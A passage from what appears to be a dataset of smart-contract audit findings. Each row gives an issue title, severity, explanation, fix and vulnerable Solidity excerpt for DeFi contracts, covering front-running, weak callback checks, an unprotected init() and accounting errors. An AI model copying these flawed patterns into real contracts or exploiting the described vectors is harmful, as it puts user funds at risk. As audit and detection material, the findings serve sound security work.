from proxy to msg.sender\\n shares = IHypervisor(pos).deposit(deposit0, deposit1, address(this));\\n IHypervisor(pos).transfer(to, shares);\\n}\\n```\\n" +Hypervisor - Multiple “sandwiching” front running vectors,medium,"The amount of tokens received from `UniswapV3Pool` functions might be manipulated by front-runners due to the decentralized nature of AMMs, where the order of transactions can not be pre-determined. A potential “sandwicher” may insert a buying order before the user's call to `Hypervisor.rebalance` for instance, and a sell order after.\\nMore specifically, calls to `pool.swap`, `pool.mint`, `pool.burn` are susceptible to “sandwiching” vectors.\\n`Hypervisor.rebalance`\\n```\\nif (swapQuantity != 0) {\\n pool.swap(\\n address(this),\\n swapQuantity > 0,\\n swapQuantity > 0 ? swapQuantity : -swapQuantity,\\n swapQuantity > 0 ? TickMath.MIN\\_SQRT\\_RATIO + 1 : TickMath.MAX\\_SQRT\\_RATIO - 1,\\n abi.encode(address(this))\\n );\\n}\\n```\\n\\n```\\nfunction \\_mintLiquidity(\\n int24 tickLower,\\n int24 tickUpper,\\n uint128 liquidity,\\n address payer\\n) internal returns (uint256 amount0, uint256 amount1) {\\n if (liquidity > 0) {\\n (amount0, amount1) = pool.mint(\\n address(this),\\n tickLower,\\n tickUpper,\\n liquidity,\\n abi.encode(payer)\\n );\\n }\\n}\\n```\\n\\n```\\nfunction \\_burnLiquidity(\\n int24 tickLower,\\n int24 tickUpper,\\n uint128 liquidity,\\n address to,\\n bool collectAll\\n) internal returns (uint256 amount0, uint256 amount1) {\\n if (liquidity > 0) {\\n // Burn liquidity\\n (uint256 owed0, uint256 owed1) = pool.burn(tickLower, tickUpper, liquidity);\\n\\n // Collect amount owed\\n uint128 collect0 = collectAll ? type(uint128).max : \\_uint128Safe(owed0);\\n uint128 collect1 = collectAll ? type(uint128).max : \\_uint128Safe(owed1);\\n if (collect0 > 0 || collect1 > 0) {\\n (amount0, amount1) = pool.collect(to, tickLower, tickUpper, collect0, collect1);\\n }\\n }\\n}\\n```\\n",Consider adding an `amountMin` parameter(s) to ensure that at least the `amountMin` of tokens was received.,,"```\\nif (swapQuantity != 0) {\\n pool.swap(\\n address(this),\\n swapQuantity > 0,\\n swapQuantity > 0 ? swapQuantity : -swapQuantity,\\n swapQuantity > 0 ? TickMath.MIN\\_SQRT\\_RATIO + 1 : TickMath.MAX\\_SQRT\\_RATIO - 1,\\n abi.encode(address(this))\\n );\\n}\\n```\\n" +Uniswap v3 callbacks access control should be hardened,low,"Resolution\\nFixed in GammaStrategies/[email protected]9a7a3dd by implementing the auditor's recommendation for `uniswapV3MintCallback`, and deleting `uniswapV3SwapCallback` and the call to `pool.swap`.\\nUniswap v3 uses a callback pattern to pull funds from the caller. The caller, (in this case Hypervisor) has to implement a callback function which will be called by the Uniswap's `pool`. Both `uniswapV3MintCallback` and `uniswapV3SwapCallback` restrict the access to the callback functions only for the `pool`. However, this alone will not block a random call from the `pool` contract in case the latter was hacked, which will result in stealing all the funds held in `Hypervisor` or of any user that approved the `Hypervisor` contract to transfer tokens on his behalf.\\n```\\nfunction uniswapV3MintCallback(\\n uint256 amount0,\\n uint256 amount1,\\n bytes calldata data\\n) external override {\\n require(msg.sender == address(pool));\\n address payer = abi.decode(data, (address));\\n\\n if (payer == address(this)) {\\n if (amount0 > 0) token0.safeTransfer(msg.sender, amount0);\\n if (amount1 > 0) token1.safeTransfer(msg.sender, amount1);\\n } else {\\n if (amount0 > 0) token0.safeTransferFrom(payer, msg.sender, amount0);\\n if (amount1 > 0) token1.safeTransferFrom(payer, msg.sender, amount1);\\n }\\n}\\n\\nfunction uniswapV3SwapCallback(\\n int256 amount0Delta,\\n int256 amount1Delta,\\n bytes calldata data\\n) external override {\\n require(msg.sender == address(pool));\\n address payer = abi.decode(data, (address));\\n\\n if (amount0Delta > 0) {\\n if (payer == address(this)) {\\n token0.safeTransfer(msg.sender, uint256(amount0Delta));\\n } else {\\n token0.safeTransferFrom(payer, msg.sender, uint256(amount0Delta));\\n }\\n } else if (amount1Delta > 0) {\\n if (payer == address(this)) {\\n token1.safeTransfer(msg.sender, uint256(amount1Delta));\\n } else {\\n token1.safeTransferFrom(payer, msg.sender, uint256(amount1Delta));\\n }\\n }\\n}\\n```\\n","Consider adding (boolean) storage variables that will help to track whether a call to `uniswapV3MintCallback | uniswapV3SwapCallback` was preceded by a call to `_mintLiquidity | rebalance` respectively. An example for the `rebalance` function would be bool `rebalanceCalled`, this variable will be assigned a `true` value in `rebalance` before the external call of `pool.swap`, then `uniswapV3SwapCallback` will require that `rebalanceCalled` == `true`, and then right after `rebalanceCalled` will be assigned a `false` value.",,"```\\nfunction uniswapV3MintCallback(\\n uint256 amount0,\\n uint256 amount1,\\n bytes calldata data\\n) external override {\\n require(msg.sender == address(pool));\\n address payer = abi.decode(data, (address));\\n\\n if (payer == address(this)) {\\n if (amount0 > 0) token0.safeTransfer(msg.sender, amount0);\\n if (amount1 > 0) token1.safeTransfer(msg.sender, amount1);\\n } else {\\n if (amount0 > 0) token0.safeTransferFrom(payer, msg.sender, amount0);\\n if (amount1 > 0) token1.safeTransferFrom(payer, msg.sender, amount1);\\n }\\n}\\n\\nfunction uniswapV3SwapCallback(\\n int256 amount0Delta,\\n int256 amount1Delta,\\n bytes calldata data\\n) external override {\\n require(msg.sender == address(pool));\\n address payer = abi.decode(data, (address));\\n\\n if (amount0Delta > 0) {\\n if (payer == address(this)) {\\n token0.safeTransfer(msg.sender, uint256(amount0Delta));\\n } else {\\n token0.safeTransferFrom(payer, msg.sender, uint256(amount0Delta));\\n }\\n } else if (amount1Delta > 0) {\\n if (payer == address(this)) {\\n token1.safeTransfer(msg.sender, uint256(amount1Delta));\\n } else {\\n token1.safeTransferFrom(payer, msg.sender, uint256(amount1Delta));\\n }\\n }\\n}\\n```\\n" +UniProxy.depositSwap doesn't deposit all the users' funds,medium,"Resolution\\nFixed in GammaStrategies/[email protected]9a7a3dd by deleting the `depositSwap` function.\\nWhen executing the swap, the minimal amount out is passed to the router (deposit1 in this example), but the actual swap amount will be `amountOut`. But after the trade, instead of depositing `amountOut`, the contract tries to deposit `deposit1`, which is lower. This may result in some users' funds staying in the `UniProxy` contract.\\n```\\nelse{\\n //swap token1 for token0\\n swap = uint256(swapAmount);\\n IHypervisor(pos).token0().transferFrom(msg.sender, address(this), deposit0+swap);\\n\\n amountOut = router.exactInput(\\n ISwapRouter.ExactInputParams(\\n path,\\n address(this),\\n block.timestamp + swapLife,\\n swap,\\n deposit1\\n )\\n ); \\n}\\n\\nrequire(amountOut > 0, ""Swap failed"");\\n\\nif (positions[pos].version < 2) {\\n // requires lp token transfer from proxy to msg.sender\\n shares = IHypervisor(pos).deposit(deposit0, deposit1, address(this));\\n IHypervisor(pos).transfer(to, shares);\\n}\\n```\\n",Deposit all the user's funds to the Hypervisor.,,"```\\nelse{\\n //swap token1 for token0\\n swap = uint256(swapAmount);\\n IHypervisor(pos).token0().transferFrom(msg.sender, address(this), deposit0+swap);\\n\\n amountOut = router.exactInput(\\n ISwapRouter.ExactInputParams(\\n path,\\n address(this),\\n block.timestamp + swapLife,\\n swap,\\n deposit1\\n )\\n ); \\n}\\n\\nrequire(amountOut > 0, ""Swap failed"");\\n\\nif (positions[pos].version < 2) {\\n // requires lp token transfer from proxy to msg.sender\\n shares = IHypervisor(pos).deposit(deposit0, deposit1, address(this));\\n IHypervisor(pos).transfer(to, shares);\\n}\\n```\\n" +Initialization flaws,low,"For non-upgradeable contracts, the Solidity compiler takes care of chaining the constructor calls of an inheritance hierarchy in the right order; for upgradeable contracts, taking care of initialization is a manual task - and with extensive use of inheritance, it is tedious and error-prone. The convention in OpenZeppelin Contracts Upgradeable is to have a `__C_init_unchained` function that contains the actual initialization logic for contract `C` and a `__C_init` function that calls the `*_init_unchained` function for every super-contract - direct and indirect - in the inheritance hierarchy (including C) in the C3-linearized order from most basic to most derived. This pattern imitates what the compiler does for constructors.\\nAll `*_init` functions in the contracts (__ERC20WrapperGluwacoin_init, `__ERC20Reservable_init`, `__ERC20ETHless_init`, and __ERC20Wrapper_init) are missing some `_init_unchained` calls, and sometimes the existing calls are not in the correct order.\\nThe `__ERC20WrapperGluwacoin_init` function is implemented as follows:\\n```\\nfunction \\_\\_ERC20WrapperGluwacoin\\_init(\\n string memory name,\\n string memory symbol,\\n IERC20 token\\n) internal initializer {\\n \\_\\_Context\\_init\\_unchained();\\n \\_\\_ERC20\\_init\\_unchained(name, symbol);\\n \\_\\_ERC20ETHless\\_init\\_unchained();\\n \\_\\_ERC20Reservable\\_init\\_unchained();\\n \\_\\_AccessControlEnumerable\\_init\\_unchained();\\n \\_\\_ERC20Wrapper\\_init\\_unchained(token);\\n \\_\\_ERC20WrapperGluwacoin\\_init\\_unchained();\\n}\\n```\\n\\nAnd the C3 linearization is:\\n```\\nERC20WrapperGluwacoin\\n ↖ ERC20Reservable\\n ↖ ERC20ETHless\\n ↖ ERC20Wrapper\\n ↖ ERC20Upgradeable\\n ↖ IERC20MetadataUpgradeable\\n ↖ IERC20Upgradeable\\n ↖ AccessControlEnumerableUpgradeable\\n ↖ AccessControlUpgradeable\\n ↖ ERC165Upgradeable\\n ↖ IERC165Upgradeable\\n ↖ IAccessControlEnumerableUpgradeable\\n ↖ IAccessControlUpgradeable\\n ↖ ContextUpgradeable\\n ↖ Initializable\\n```\\n\\nThe calls `__ERC165_init_unchained();` and `__AccessControl_init_unchained();` are missing, and `__ERC20Wrapper_init_unchained(token);` should move between `__ERC20_init_unchained(name, symbol);` and `__ERC20ETHless_init_unchained();`.","Review all `*_init` functions, add the missing `*_init_unchained` calls, and fix the order of these calls.",,"```\\nfunction \\_\\_ERC20WrapperGluwacoin\\_init(\\n string memory name,\\n string memory symbol,\\n IERC20 token\\n) internal initializer {\\n \\_\\_Context\\_init\\_unchained();\\n \\_\\_ERC20\\_init\\_unchained(name, symbol);\\n \\_\\_ERC20ETHless\\_init\\_unchained();\\n \\_\\_ERC20Reservable\\_init\\_unchained();\\n \\_\\_AccessControlEnumerable\\_init\\_unchained();\\n \\_\\_ERC20Wrapper\\_init\\_unchained(token);\\n \\_\\_ERC20WrapperGluwacoin\\_init\\_unchained();\\n}\\n```\\n" +Flaw in _beforeTokenTransfer call chain and missing tests,low,"In OpenZeppelin's ERC-20 implementation, the virtual `_beforeTokenTransfer` function provides a hook that is called before tokens are transferred, minted, or burned. In the Gluwacoin codebase, it is used to check whether the unreserved balance (as opposed to the regular balance, which is checked by the ERC-20 implementation) of the sender is sufficient to allow this transfer or burning.\\nIn `ERC20WrapperGluwacoin`, `ERC20Reservable`, and `ERC20Wrapper`, the `_beforeTokenTransfer` function is implemented in the following way:\\n```\\nfunction \\_beforeTokenTransfer(\\n address from,\\n address to,\\n uint256 amount\\n) internal override(ERC20Upgradeable, ERC20Wrapper, ERC20Reservable) {\\n ERC20Wrapper.\\_beforeTokenTransfer(from, to, amount);\\n ERC20Reservable.\\_beforeTokenTransfer(from, to, amount);\\n}\\n```\\n\\n```\\nfunction \\_beforeTokenTransfer(address from, address to, uint256 amount) internal virtual override (ERC20Upgradeable) {\\n if (from != address(0)) {\\n require(\\_unreservedBalance(from) >= amount, ""ERC20Reservable: transfer amount exceeds unreserved balance"");\\n }\\n\\n super.\\_beforeTokenTransfer(from, to, amount);\\n}\\n```\\n\\n```\\nfunction \\_beforeTokenTransfer(address from, address to, uint256 amount) internal virtual override (ERC20Upgradeable) {\\n super.\\_beforeTokenTransfer(from, to, amount);\\n}\\n```\\n\\nFinally, the C3-linearization of the contracts is:\\n```\\nERC20WrapperGluwacoin\\n ↖ ERC20Reservable\\n ↖ ERC20ETHless\\n ↖ ERC20Wrapper\\n ↖ ERC20Upgradeable\\n ↖ IERC20MetadataUpgradeable\\n ↖ IERC20Upgradeable\\n ↖ AccessControlEnumerableUpgradeable\\n ↖ AccessControlUpgradeable\\n ↖ ERC165Upgradeable\\n ↖ IERC165Upgradeable\\n ↖ IAccessControlEnumerableUpgradeable\\n ↖ IAccessControlUpgradeable\\n ↖ ContextUpgradeable\\n ↖ Initializable\\n```\\n\\nThis means `ERC20Wrapper._beforeTokenTransfer` is ultimately called twice - once directly in `ERC20WrapperGluwacoin._beforeTokenTransfer` and then a second time because the `super._beforeTokenTransfer` call in `ERC20Reservable._beforeTokenTransfer` resolves to `ERC20Wrapper._beforeTokenTransfer`. (ERC20ETHless doesn't override _beforeTokenTransfer.)\\nMoreover, while reviewing the correctness and coverage of the tests is not in scope for this engagement, we happened to notice that there are no tests that check whether the unreserved balance is sufficient for transferring or burning tokens.","`ERC20WrapperGluwacoin._beforeTokenTransfer` should just call `super._beforeTokenTransfer`. Moreover, the `_beforeTokenTransfer` implementation can be removed from `ERC20Wrapper`.\\nWe would like to stress the importance of careful and comprehensive testing in general and of this functionality in particular, as it is crucial for the system's integrity. We also encourage investigating whether there are more such omissions and an evaluation of the test quality and coverage in general.",,"```\\nfunction \\_beforeTokenTransfer(\\n address from,\\n address to,\\n uint256 amount\\n) internal override(ERC20Upgradeable, ERC20Wrapper, ERC20Reservable) {\\n ERC20Wrapper.\\_beforeTokenTransfer(from, to, amount);\\n ERC20Reservable.\\_beforeTokenTransfer(from, to, amount);\\n}\\n```\\n" +Hard-coded decimals,low,"The Gluwacoin wrapper token should have the same number of decimals as the wrapped ERC-20. Currently, the number of decimals is hard-coded to 6. This limits flexibility or requires source code changes and recompilation if a token with a different number of decimals is to be wrapped.\\n```\\nfunction decimals() public pure override returns (uint8) {\\n return 6;\\n}\\n```\\n","We recommend supplying the number of `decimals` as an initialization parameter and storing it in a state variable. That increases gas consumption of the `decimals` function, but we doubt this view function will be frequently called from a contract, and even if it was, we think the benefits far outweigh the costs.\\nMoreover, we believe the `decimals` logic (i.e., function `decimals` and the new state variable) should be implemented in the `ERC20Wrapper` contract - which holds the basic ERC-20 functionality of the wrapper token - and not in `ERC20WrapperGluwacoin`, which is the base contract of the entire system.",,```\\nfunction decimals() public pure override returns (uint8) {\\n return 6;\\n}\\n```\\n +Re-initialization of the Balancer pool is potentially possible,low,"Instead of creating a new Balancer pool for an auction every time, the same pool is getting re-used repeatedly. When this happens, the old liquidity is withdrawn, and if there is enough FEI in the contract, the weights are shifted pool is filled with new tokens. If there is not enough FEI, the pool is left empty, and users can still interact with it. When there's enough FEI again, it's re-initialized again, which is not the intention:\\n```\\nuint256 bptTotal = pool.totalSupply();\\nuint256 bptBalance = pool.balanceOf(address(this));\\n\\n// Balancer locks a small amount of bptTotal after init, so 0 bpt means pool needs initializing\\nif (bptTotal == 0) {\\n \\_initializePool();\\n return;\\n}\\n```\\n\\nTheoretically, this will never happen because there should be minimal leftover liquidity tokens after the withdrawal. But we couldn't strictly verify that fact because it requires looking into balancer code much deeper.","One of the options would be only to allow re-using the pool in atomic transactions. So if there are not enough FEI tokens for the next auction, the `swap` transaction reverts. That will help with another issue (issue 3.2) too.",,"```\\nuint256 bptTotal = pool.totalSupply();\\nuint256 bptBalance = pool.balanceOf(address(this));\\n\\n// Balancer locks a small amount of bptTotal after init, so 0 bpt means pool needs initializing\\nif (bptTotal == 0) {\\n \\_initializePool();\\n return;\\n}\\n```\\n" +The BalancerLBPSwapper may not have enough Tribe tokens,low,"Whenever the `swap` function is called, it should re-initialize the Balancer pool that requires adding liquidity: 99% Fei and 1% Tribe. So the Tribe should initially be in the contract.\\n```\\nfunction \\_getTokensIn(uint256 spentTokenBalance) internal view returns(uint256[] memory amountsIn) {\\n amountsIn = new uint256[](2);\\n\\n uint256 receivedTokenBalance = readOracle().mul(spentTokenBalance).mul(ONE\\_PERCENT).div(NINETY\\_NINE\\_PERCENT).asUint256();\\n\\n if (address(assets[0]) == tokenSpent) {\\n amountsIn[0] = spentTokenBalance;\\n amountsIn[1] = receivedTokenBalance;\\n } else {\\n amountsIn[0] = receivedTokenBalance;\\n amountsIn[1] = spentTokenBalance;\\n }\\n}\\n```\\n\\nAdditionally, when the `swap` is called, and there is not enough FEI to re-initiate the Balancer auction, all the Tribe gets withdrawn. So the next time the `swap` is called, there is no Tribe in the contract again.\\n```\\n// 5. Send remaining tokenReceived to target\\nIERC20(tokenReceived).transfer(tokenReceivingAddress, IERC20(tokenReceived).balanceOf(address(this)));\\n```\\n",Create an automated mechanism that mints/transfers Tribe when it is needed in the swapper contract.,,```\\nfunction \\_getTokensIn(uint256 spentTokenBalance) internal view returns(uint256[] memory amountsIn) {\\n amountsIn = new uint256[](2);\\n\\n uint256 receivedTokenBalance = readOracle().mul(spentTokenBalance).mul(ONE\\_PERCENT).div(NINETY\\_NINE\\_PERCENT).asUint256();\\n\\n if (address(assets[0]) == tokenSpent) {\\n amountsIn[0] = spentTokenBalance;\\n amountsIn[1] = receivedTokenBalance;\\n } else {\\n amountsIn[0] = receivedTokenBalance;\\n amountsIn[1] = spentTokenBalance;\\n }\\n}\\n```\\n +StableSwapOperatorV1 - resistantFei value is not correct in the resistantBalanceAndFei function,high,"The `resistantBalanceAndFei` function of a `PCVDeposit` contract is supposed to return the amount of funds that the contract controls; it is then used to evaluate the total value of PCV (collateral in the protocol). Additionally, this function returns the number of FEI tokens that are protocol-controlled. These FEI tokens are “temporarily minted”; they are not backed up by the collateral and shouldn't be used in calculations that determine the collateralization of the protocol.\\nIdeally, the amount of these FEI tokens should be the same during the deposit, withdrawal, and the `resistantBalanceAndFei` function call. In the `StableSwapOperatorV1` contract, all these values are totally different:\\nduring the deposit, the amount of required FEI tokens is calculated. It's done in a way so the values of FEI and 3pool tokens in the metapool should be equal after the deposit. So if there is the initial imbalance of FEI and 3pool tokens, the deposit value of these tokens will be different:\\n```\\n// get the amount of tokens in the pool\\n(uint256 \\_3crvAmount, uint256 \\_feiAmount) = (\\n IStableSwap2(pool).balances(\\_3crvIndex),\\n IStableSwap2(pool).balances(\\_feiIndex)\\n);\\n// // rest of code and the expected amount of 3crv in it after deposit\\nuint256 \\_3crvAmountAfter = \\_3crvAmount + \\_3crvBalanceAfter;\\n \\n// get the usd value of 3crv in the pool\\nuint256 \\_3crvUsdValue = \\_3crvAmountAfter \\* IStableSwap3(\\_3pool).get\\_virtual\\_price() / 1e18;\\n \\n// compute the number of FEI to deposit\\nuint256 \\_feiToDeposit = 0;\\nif (\\_3crvUsdValue > \\_feiAmount) {\\n \\_feiToDeposit = \\_3crvUsdValue - \\_feiAmount;\\n}\\n```\\n\\nduring the withdrawal, the FEI and 3pool tokens are withdrawn in the same proportion as they are present in the metapool:\\n```\\nuint256[2] memory \\_minAmounts; // [0, 0]\\nIERC20(pool).approve(pool, \\_lpToWithdraw);\\nuint256 \\_3crvBalanceBefore = IERC20(\\_3crv).balanceOf(address(this));\\nIStableSwap2(pool).remove\\_liquidity(\\_lpToWithdraw, \\_minAmounts);\\n```\\n\\nin the `resistantBalanceAndFei` function, the value of protocol-controlled FEI tokens and the value of 3pool tokens deposited are considered equal:\\n```\\nresistantBalance = \\_lpPriceUSD / 2;\\nresistantFei = resistantBalance;\\n```\\n\\nSome of these values may be equal under some circumstances, but that is not enforced. After one of the steps (deposit or withdrawal), the total PCV value and collateralization may be changed significantly.","Make sure that deposit, withdrawal, and the `resistantBalanceAndFei` are consistent and won't instantly change the PCV value significantly.",,"```\\n// get the amount of tokens in the pool\\n(uint256 \\_3crvAmount, uint256 \\_feiAmount) = (\\n IStableSwap2(pool).balances(\\_3crvIndex),\\n IStableSwap2(pool).balances(\\_feiIndex)\\n);\\n// // rest of code and the expected amount of 3crv in it after deposit\\nuint256 \\_3crvAmountAfter = \\_3crvAmount + \\_3crvBalanceAfter;\\n \\n// get the usd value of 3crv in the pool\\nuint256 \\_3crvUsdValue = \\_3crvAmountAfter \\* IStableSwap3(\\_3pool).get\\_virtual\\_price() / 1e18;\\n \\n// compute the number of FEI to deposit\\nuint256 \\_feiToDeposit = 0;\\nif (\\_3crvUsdValue > \\_feiAmount) {\\n \\_feiToDeposit = \\_3crvUsdValue - \\_feiAmount;\\n}\\n```\\n" +CollateralizationOracle - Fei in excluded deposits contributes to userCirculatingFei,high,"`CollateralizationOracle.pcvStats` iterates over all deposits, queries the resistant balance and FEI for each deposit, and accumulates the total value of the resistant balances and the total resistant FEI. Any Guardian or Governor can exclude (and re-include) a deposit that has become problematic in some way, for example, because it is reporting wrong numbers. Finally, the `pcvStats` function computes the `userCirculatingFei` as the total FEI supply minus the accumulated resistant FEI balances; the idea here is to determine the amount of “free” FEI, or FEI that is not PCV. However, the FEI balances from excluded deposits contribute to the `userCirculatingFei`, although they are clearly not “free” FEI. That leads to a wrong `protocolEquity` and a skewed collateralization ratio and might therefore have a significant impact on the economics of the system.\\nIt should be noted that even the exclusion from the total PCV leads to a `protocolEquity` and a collateralization ratio that could be considered skewed (again, it might depend on the exact reasons for exclusion), but “adding” the missing FEI to the `userCirculatingFei` distorts these numbers even more.\\nIn the extreme scenario that all deposits have been excluded, the entire Fei supply is currently reported as `userCirculatingFei`.\\n```\\n/// @notice returns the Protocol-Controlled Value, User-circulating FEI, and\\n/// Protocol Equity.\\n/// @return protocolControlledValue : the total USD value of all assets held\\n/// by the protocol.\\n/// @return userCirculatingFei : the number of FEI not owned by the protocol.\\n/// @return protocolEquity : the difference between PCV and user circulating FEI.\\n/// If there are more circulating FEI than $ in the PCV, equity is 0.\\n/// @return validityStatus : the current oracle validity status (false if any\\n/// of the oracles for tokens held in the PCV are invalid, or if\\n/// this contract is paused).\\nfunction pcvStats() public override view returns (\\n uint256 protocolControlledValue,\\n uint256 userCirculatingFei,\\n int256 protocolEquity,\\n bool validityStatus\\n) {\\n uint256 \\_protocolControlledFei = 0;\\n validityStatus = !paused();\\n\\n // For each token// rest of code\\n for (uint256 i = 0; i < tokensInPcv.length(); i++) {\\n address \\_token = tokensInPcv.at(i);\\n uint256 \\_totalTokenBalance = 0;\\n\\n // For each deposit// rest of code\\n for (uint256 j = 0; j < tokenToDeposits[\\_token].length(); j++) {\\n address \\_deposit = tokenToDeposits[\\_token].at(j);\\n\\n // ignore deposits that are excluded by the Guardian\\n if (!excludedDeposits[\\_deposit]) {\\n // read the deposit, and increment token balance/protocol fei\\n (uint256 \\_depositBalance, uint256 \\_depositFei) = IPCVDepositBalances(\\_deposit).resistantBalanceAndFei();\\n \\_totalTokenBalance += \\_depositBalance;\\n \\_protocolControlledFei += \\_depositFei;\\n }\\n }\\n\\n // If the protocol holds non-zero balance of tokens, fetch the oracle price to\\n // increment PCV by \\_totalTokenBalance \\* oracle price USD.\\n if (\\_totalTokenBalance != 0) {\\n (Decimal.D256 memory \\_oraclePrice, bool \\_oracleValid) = IOracle(tokenToOracle[\\_token]).read();\\n if (!\\_oracleValid) {\\n validityStatus = false;\\n }\\n protocolControlledValue += \\_oraclePrice.mul(\\_totalTokenBalance).asUint256();\\n }\\n }\\n\\n userCirculatingFei = fei().totalSupply() - \\_protocolControlledFei;\\n protocolEquity = int256(protocolControlledValue) - int256(userCirculatingFei);\\n}\\n```\\n","It is unclear how to fix this. One might want to exclude the FEI in excluded deposits entirely from the calculation, but not knowing the amount was the reason to exclude the deposit in the first place.\\nOne option could be to let the entity that excludes a deposit specify substitute values that should be used instead of querying the numbers from the deposit. However, it is questionable whether this approach is practical if the numbers we'd like to see as substitute values change quickly or repeatedly over time. Ultimately, the querying function itself should be fixed. Moreover, as the substitute values can dramatically impact the system economics, we'd only like to trust the Governor with this and not give this permission to a Guardian. However, the original intention was to give a role with less trust than the Governor the possibility to react quickly to a deposit that reports wrong numbers; if the exclusion of deposits becomes the Governor's privilege, such a quick and lightweight intervention isn't possible anymore.\\nIndependently, we recommend taking proper care of the situation that all deposits - or just too many - have been excluded, for example, by setting the returned `validityStatus` to `false`, as in this case, there is not enough information to compute the collateralization ratio even as a crude approximation.",,"```\\n/// @notice returns the Protocol-Controlled Value, User-circulating FEI, and\\n/// Protocol Equity.\\n/// @return protocolControlledValue : the total USD value of all assets held\\n/// by the protocol.\\n/// @return userCirculatingFei : the number of FEI not owned by the protocol.\\n/// @return protocolEquity : the difference between PCV and user circulating FEI.\\n/// If there are more circulating FEI than $ in the PCV, equity is 0.\\n/// @return validityStatus : the current oracle validity status (false if any\\n/// of the oracles for tokens held in the PCV are invalid, or if\\n/// this contract is paused).\\nfunction pcvStats() public override view returns (\\n uint256 protocolControlledValue,\\n uint256 userCirculatingFei,\\n int256 protocolEquity,\\n bool validityStatus\\n) {\\n uint256 \\_protocolControlledFei = 0;\\n validityStatus = !paused();\\n\\n // For each token// rest of code\\n for (uint256 i = 0; i < tokensInPcv.length(); i++) {\\n address \\_token = tokensInPcv.at(i);\\n uint256 \\_totalTokenBalance = 0;\\n\\n // For each deposit// rest of code\\n for (uint256 j = 0; j < tokenToDeposits[\\_token].length(); j++) {\\n address \\_deposit = tokenToDeposits[\\_token].at(j);\\n\\n // ignore deposits that are excluded by the Guardian\\n if (!excludedDeposits[\\_deposit]) {\\n // read the deposit, and increment token balance/protocol fei\\n (uint256 \\_depositBalance, uint256 \\_depositFei) = IPCVDepositBalances(\\_deposit).resistantBalanceAndFei();\\n \\_totalTokenBalance += \\_depositBalance;\\n \\_protocolControlledFei += \\_depositFei;\\n }\\n }\\n\\n // If the protocol holds non-zero balance of tokens, fetch the oracle price to\\n // increment PCV by \\_totalTokenBalance \\* oracle price USD.\\n if (\\_totalTokenBalance != 0) {\\n (Decimal.D256 memory \\_oraclePrice, bool \\_oracleValid) = IOracle(tokenToOracle[\\_token]).read();\\n if (!\\_oracleValid) {\\n validityStatus = false;\\n }\\n protocolControlledValue += \\_oraclePrice.mul(\\_totalTokenBalance).asUint256();\\n }\\n }\\n\\n userCirculatingFei = fei().totalSupply() - \\_protocolControlledFei;\\n protocolEquity = int256(protocolControlledValue) - int256(userCirculatingFei);\\n}\\n```\\n" +BalancerLBPSwapper - init() can be front-run to potentially steal tokens,medium,"The deployment process for `BalancerLBPSwapper` appears to be the following:\\ndeploy `BalancerLBPSwapper`.\\nrun `ILiquidityBootstrappingPoolFactory.create()` proving the newly deployed swapper address as the owner of the pool.\\ninitialize `BalancerLBPSwapper.init()` with the address of the newly created pool.\\nThis process may be split across multiple transactions as in the `v2Phase1.js` deployment scenario.\\nBetween step (1) and (3) there is a window of opportunity for someone to maliciously initialize contract. This should be easily detectable because calling `init()` twice should revert the second transaction. If this is not caught in the deployment script this may have more severe security implications. Otherwise, this window can be used to grief the deployment initializing it before the original initializer does forcing them to redeploy the contract or to steal any tokenSpent/tokenReceived that are owned by the contract at this time.\\nNote: It is assumed that the contract will not own a lot of tokens right after deployment rendering the scenario of stealing tokens more unlikely. However, that highly depends on the deployment script for the contract system.\\n```\\nfunction init(IWeightedPool \\_pool) external {\\n require(address(pool) == address(0), ""BalancerLBPSwapper: initialized"");\\n\\n pool = \\_pool;\\n IVault \\_vault = \\_pool.getVault();\\n\\n vault = \\_vault;\\n\\n // Check ownership\\n require(\\_pool.getOwner() == address(this), ""BalancerLBPSwapper: contract not pool owner"");\\n```\\n\\n```\\nIERC20(tokenSpent).approve(address(\\_vault), type(uint256).max);\\nIERC20(tokenReceived).approve(address(\\_vault), type(uint256).max);\\n```\\n",protect `BalancerLBPSwapper.init()` and only allow a trusted entity (e.g. the initial deployer) to call this method.,,"```\\nfunction init(IWeightedPool \\_pool) external {\\n require(address(pool) == address(0), ""BalancerLBPSwapper: initialized"");\\n\\n pool = \\_pool;\\n IVault \\_vault = \\_pool.getVault();\\n\\n vault = \\_vault;\\n\\n // Check ownership\\n require(\\_pool.getOwner() == address(this), ""BalancerLBPSwapper: contract not pool owner"");\\n```\\n" +PCVEquityMinter and BalancerLBPSwapper - desynchronisation race,medium,"There is nothing that prevents other actors from calling `BalancerLBPSwapper.swap()` `afterTime` but right before `PCVEquityMinter.mint()` would as long as the `minAmount` required for the call to pass is deposited to `BalancerLBPSwapper`.\\nBoth the `PCVEquityMinter.mint()` and `BalancerLBPSwapper.swap()` are timed (via the `afterTime` modifier) and are ideally in sync. In an ideal world the incentive to call `mint()` would be enough to ensure that both contracts are always in sync, however, a malicious actor might interfere by calling `.swap()` directly, providing the `minAmount` required for the call to pass. This will have two effects:\\ninstead of taking the newly minted FEI from `PCVEquityMinter`, existing FEI from the malicious user will be used with the pool. (instead of inflating the token the malicious actor basically pays for it)\\nthe `Timed` modifiers of both contracts will be out of sync with `BalancerLBPSwapper.swap()` being reset (and failing until it becomes available again) and `PCVEquityMinter.mint()` still being available. Furthermore, keeper-scripts (or actors that want to get the incentive) might continue to attempt to `mint()` while the call will ultimately fail in `.swap()` due to the resynchronization of `timed` (unless they simulate the calls first).\\nNote: There are not a lot of incentives to actually exploit this other than preventing protocol inflation (mint) and potentially griefing users. A malicious user will lose out on the incentivized call and has to ensure that the `minAmount` required for `.swap()` to work is available. It is, however, in the best interest of security to defuse the unpredictable racy character of the contract interaction.\\n```\\nfunction \\_afterMint() internal override {\\n IPCVSwapper(target).swap();\\n}\\n```\\n\\n```\\nfunction swap() external override afterTime whenNotPaused {\\n (\\n uint256 spentReserves,\\n uint256 receivedReserves, \\n uint256 lastChangeBlock\\n ) = getReserves();\\n\\n // Ensures no actor can change the pool contents earlier in the block\\n require(lastChangeBlock < block.number, ""BalancerLBPSwapper: pool changed this block"");\\n```\\n",If `BalancerLBPSwapper.swap()` is only to be called within the flows of action from a `PCVEquityMinter.mint()` it is suggested to authenticate the call and only let `PCVEquityMinter` call `.swap()`,,```\\nfunction \\_afterMint() internal override {\\n IPCVSwapper(target).swap();\\n}\\n```\\n +CollateralizationOracleWrapper - the deviation threshold check in update() always returns false,medium,"A call to `update()` returns a boolean flag indicating whether the update was performed on outdated data. This flag is being checked in `updateIfOutdated()` which is typically called by an incentivized keeper function.\\nThe `_isExceededDeviationThreshold` calls at the end of the `_update()` function always return `false` as they are comparing the same values (cachedProtocolControlledValue to the `_protocolControlledValue` value and 